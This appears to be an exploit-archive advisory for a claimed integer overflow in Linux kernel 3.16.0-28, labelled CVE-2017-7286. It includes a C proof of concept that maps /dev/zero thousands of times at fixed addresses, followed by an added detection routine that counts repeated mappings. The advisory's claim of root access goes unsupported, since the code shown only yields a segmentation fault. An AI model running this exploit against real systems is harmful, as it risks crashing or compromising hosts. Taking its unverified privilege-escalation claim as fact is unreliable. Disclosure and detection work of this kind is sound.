Linux kernel version 3.16.0-28 suffers from an integer overflow vulnerability.
[+] Title: Linux kernel 3.16.0-28 - Integer overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-7286
Vendor:
===============
https://www.kernel.org/
Vulnerability Type:
===================
"inode" Integer overflow
Exploit:
===================
// The inode can be overflowed by mapping a single file too many times, possibly allowing a local user to gain root access.
// gcc buffer.c -o buffer
// $ ./buffer
// Segmentation Fault

#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(void)
{
    int fd, i;

    fd = open("/dev/zero", O_RDONLY);

    // Map one byte of the same file at 26999 fixed addresses, 0x10000 apart, starting at address 0.
    for (i = 0; i < 26999; i++) {
        mmap((char *)0x00000000 + (0x10000 * i), 1, PROT_READ, MAP_SHARED | MAP_FIXED, fd, 0);
    }

    return 0;
}
CVE Reference:
===============
CVE-2017-7286
Tested on:
===============
Linux ubuntu 3.16.0-28 x86_64
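
A triage check for the behaviour the PoC above exhibits (one file mapped many times by a single process), as an added example that is not part of the original advisory: it counts mappings per backing path in /proc/<pid>/maps-format text. The sample input, the function names and the threshold are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample in /proc/<pid>/maps format, not captured from a real host. */
static const char SAMPLE_MAPS[] =
    "00010000-00011000 r--s 00000000 00:05 4101 /dev/zero (deleted)\n"
    "00020000-00021000 r--s 00000000 00:05 4102 /dev/zero (deleted)\n"
    "00030000-00031000 r--s 00000000 00:05 4103 /dev/zero (deleted)\n"
    "00400000-00401000 r-xp 00000000 08:01 131 /home/user/buffer\n"
    "7ffd1000-7ffd3000 rw-p 00000000 00:00 0\n";

/* Count mappings in maps-format text whose backing path equals `path`.
 * A trailing " (deleted)" marker is ignored; anonymous lines never match. */
int count_mappings(const char *maps, const char *path)
{
    static const char DEL[] = " (deleted)";
    int count = 0;
    while (*maps) {
        const char *end = strchr(maps, '\n');
        size_t len = end ? (size_t)(end - maps) : strlen(maps);
        char buf[512], name[256];
        if (len < sizeof buf) {            /* over-long lines are skipped */
            memcpy(buf, maps, len);
            buf[len] = '\0';
            /* Fields: range perms offset dev inode [path] */
            if (sscanf(buf, "%*s %*s %*s %*s %*s %255[^\n]", name) == 1) {
                size_t n = strlen(name), d = sizeof DEL - 1;
                if (n > d && strcmp(name + n - d, DEL) == 0)
                    name[n - d] = '\0';
                if (strcmp(name, path) == 0)
                    count++;
            }
        }
        maps += len + (end ? 1 : 0);
    }
    return count;
}

/* Nonzero when `path` is mapped more than `limit` times (limit is the caller's choice). */
int excessive_mappings(const char *maps, const char *path, int limit)
{
    return count_mappings(maps, path) > limit;
}

int main(void)
{
    printf("/dev/zero mappings in sample: %d\n",
           count_mappings(SAMPLE_MAPS, "/dev/zero"));
    return 0;
}
```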